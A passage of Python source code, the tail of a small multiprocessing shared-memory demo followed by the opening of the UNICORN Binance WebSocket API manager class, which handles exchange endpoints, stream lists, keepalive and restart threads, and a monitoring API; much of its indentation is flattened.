array = multiprocessing.sharedctypes.RawArray(ctypes.c_uint8, 3 * 10240)
print('source address', ctypes.addressof(array))
    process = ctx.Process(target=target2, args=(array,))
    process.start()
time.sleep(0.1)
print('source', array[0])
array[0] = 2
time.sleep(1)
print('source', array[0])
array[0] = 17
time.sleep(1)
if __name__ == '__main__':
do_it2()
|
unicorn_binance_websocket_api_manager.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import ujson as json
import websockets
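# Illustrative sketch (not part of the original module): a minimal callback with the
# `process_stream_data(stream_data, stream_buffer_name)` signature described in the
# class docstring below. Passing such a callable as `process_stream_data=` to
# BinanceWebSocketApiManager bypasses the generic stream_buffer; the print call is
# just a stand-in for real processing and is an assumption of this demo.
def _example_process_stream_data(stream_data, stream_buffer_name=False):
    # `stream_data` arrives as delivered by the endpoint (or converted, depending on
    # the `output_default`/`output` settings); hand it to your own processing here.
    print(f"received ({stream_buffer_name}): {stream_data}")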
class BinanceWebSocketApiManager(threading.Thread):
"""
    An unofficial Python API to use the Binance Websocket APIs (com+testnet, com-margin+testnet,
    com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in an easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
                                `stream_data` contains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function
will be called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
                                   like `process_stream_signals(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.34.2.dev"
logging.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
if disable_colorama is not True:
logging.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logging.info(f"Using `websockets_{websockets.__version__}`")
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logging.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logging.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logging.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logging.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream.binance.cc/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logging.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logging.warning(update_msg)
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=False,
ping_timeout=False,
close_timeout=False,
stream_buffer_maxlen=None):
"""
Create a list entry for new streams
        :param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
        :param output: the default setting `raw_data` can be globally overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
                       of `BinanceWebSocketApiManager()`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
        :param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non-generic
                                     `stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
"""
if output is False:
output = self.output_default
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'kill_request': None,
'stop_request': None,
'crash_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logging.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
        Companion function of self.create_stream(): creates a thread for the socket and manages the coroutine.
:param loop: provide a asynio loop
:type loop: asyncio loop
        :param stream_id: provide a stream_id (only needed for userData streams to acquire a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
        :param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non-generic
                                     `stream_buffer`. The generic `stream_buffer` always uses the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
        :param restart: set to `True` if it's a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.process_stream_signals("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
"""
        This method gets started as a thread and performs the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logging.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logging.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logging.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logging.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
< time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logging.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _keepalive_streams(self):
"""
        This method is started as a thread and observes the streams; if necessary, it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info(
"BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
                    # find restarts that didn't work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id]['status'] = "new"
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is True:
self.kill_stream(stream_id)
thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
        This is NOT stop/start! Its purpose is to start a dead stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: uuid
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logging.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + ")")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - OSError - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True))
thread.start()
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: uuid
"""
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
        Threaded method that serves the monitoring API
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
        If it is not possible to process received stream data (for example, because the database is restarting and the
